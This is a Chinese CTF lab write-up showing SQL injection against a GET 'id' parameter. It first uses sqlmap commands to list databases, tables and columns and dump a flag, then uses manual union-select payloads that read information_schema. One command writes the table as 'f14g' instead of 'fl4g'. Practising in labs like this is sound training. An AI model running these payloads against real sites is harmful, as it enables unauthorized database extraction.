本文已参与「新人创作礼」活动,一起开启掘金创作之路。
一. 启动场景
二.sqlmap爆破
观察URL,猜测大概为GET型传参,丢入sqlmap跑
1. python sqlmap.py -u "http://eci-2zehdxhy6mqjwhru8jkz.cloudeci1.ichunqiu.com/index.php?id=1"
从图中我们可以看出其数据库为--MySQL
爆破其数据库名称:
2. python sqlmap.py -u "http://eci-2zehdxhy6mqjwhru8jkz.cloudeci1.ichunqiu.com/index.php?id=1" --dbs
观察其爆破出的数据库,猜测flag多半在note数据库中
爆破其note数据库中的表名:
2. python sqlmap.py -u "http://eci-2zehdxhy6mqjwhru8jkz.cloudeci1.ichunqiu.com/index.php?id=1" -D note --tables
发现其表名中存在一个--fl4g,flag多半就在里面
用sqlmap跑出其flag:
3.python sqlmap.py -u "http://eci-2zehdxhy6mqjwhru8jkz.cloudeci1.ichunqiu.com/index.php?id=1" -D note -T f14g --columns
发现一个字段名为--fllllag,读取其中的内容
读取flag
4.python sqlmap.py -u "http://eci-2zehdxhy6mqjwhru8jkz.cloudeci1.ichunqiu.com/index.php?id=1" -D note -T fl4g -C fllllag --dump
提交flag发现其回答正确
三.手工注入
?id=1' order by 3 -- -
?id=-1' union select 1,2,3 -- -
?id=-1' union select 1,database(),3 -- -
?id=-1' union select 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='note' -- -
?id=-1' union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='fl4g' -- -
?id=-1' union select 1,group_concat(fllllag),3 FROM fl4g -- -
